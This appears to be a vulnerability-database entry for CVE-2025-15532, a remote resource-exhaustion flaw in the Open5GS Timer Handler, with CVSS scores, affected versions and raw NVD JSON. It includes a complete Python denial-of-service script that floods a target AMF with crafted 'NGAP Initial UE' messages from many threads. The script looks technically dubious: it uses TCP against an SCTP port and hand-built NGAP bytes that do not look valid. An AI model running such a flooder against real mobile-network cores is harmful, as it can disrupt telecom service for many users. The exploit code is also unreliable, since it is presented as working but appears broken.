Security Vulnerability Report
CVE-2025-15532 CVSS 5.3 MEDIUM

Published: 2026-01-17 17:15:48
Last Modified: 2026-02-23 09:16:28

Description

A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. The manipulation results in resource consumption. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The patch is identified as c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. It is best practice to apply a patch to resolve this issue.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.6
Open5GS 2.7.5 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-15532 PoC - Open5GS Timer Handler Resource Consumption
This PoC demonstrates resource exhaustion through excessive timer creation.
"""
import socket
import struct
import time
from concurrent.futures import ThreadPoolExecutor


def create_ngap_init_message(ue_id):
    """Generate NGAP Initial UE Message to trigger timer creation"""
    # Simplified NGAP header structure
    ngap_pdu = b'\x00\x00'
    # Add Procedure Code for Initial UE Message (0x0c)
    ngap_pdu += b'\x00\x0c'
    # Add criticality (reject)
    ngap_pdu += b'\x00'
    # Add message format
    ngap_pdu += b'\x02\x00\x00\x01'
    # Add UE ID
    ngap_pdu += struct.pack('>Q', ue_id)
    return ngap_pdu


def send_trigger_request(host, port, ue_id):
    """Send triggering request to Open5GS AMF"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((host, port))
        message = create_ngap_init_message(ue_id)
        sock.send(message)
        sock.close()
        return True
    except Exception as e:
        print(f"Request failed: {e}")
        return False


def exploit_cve_2025_15532(target_ip, amf_port=38412, threads=50, duration=60):
    """
    Exploit resource consumption in Open5GS Timer Handler

    Args:
        target_ip: Open5GS AMF IP address
        amf_port: AMF SCTP port (default: 38412)
        threads: Number of concurrent threads
        duration: Attack duration in seconds
    """
    print(f"[*] Starting CVE-2025-15532 exploit against {target_ip}:{amf_port}")
    print(f"[*] Using {threads} threads for {duration} seconds")
    start_time = time.time()
    ue_id = 0x100000000000001
    request_count = 0
    while time.time() - start_time < duration:
        with ThreadPoolExecutor(max_workers=threads) as executor:
            futures = []
            for i in range(threads):
                future = executor.submit(send_trigger_request, target_ip, amf_port, ue_id + i)
                futures.append(future)
            for future in futures:
                if future.result():
                    request_count += 1
        print(f"[*] Sent batch, total requests: {request_count}")
        time.sleep(0.1)
    print(f"[+] Attack completed. Total requests sent: {request_count}")
    print(f"[+] Target timer handler should be experiencing resource exhaustion")


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-15532_poc.py <target_ip> [port] [threads] [duration]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 38412
    threads = int(sys.argv[3]) if len(sys.argv) > 3 else 50
    duration = int(sys.argv[4]) if len(sys.argv) > 4 else 60
    exploit_cve_2025_15532(target, port, threads, duration)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15532", "sourceIdentifier": "[email protected]", "published": "2026-01-17T17:15:47.800", "lastModified": "2026-02-23T09:16:28.287", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. The manipulation results in resource consumption. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The patch is identified as c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. It is best practice to apply a patch to resolve this issue."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en Open5GS hasta 2.7.5. Este problema afecta a algún procesamiento desconocido del componente Timer Handler. La manipulación resulta en consumo de recursos. El ataque puede ser realizado de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. El parche se identifica como c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. 
Es una buena práctica aplicar un parche para resolver este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": 
"NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.5", "matchCriteriaId": "7D0FBF91-87F5-4984-AC37-744D9BFC13C0"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/c7c131f8d2cb1195ada5e0e691b6868ebcd8a845", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4220", "sour ... (truncated)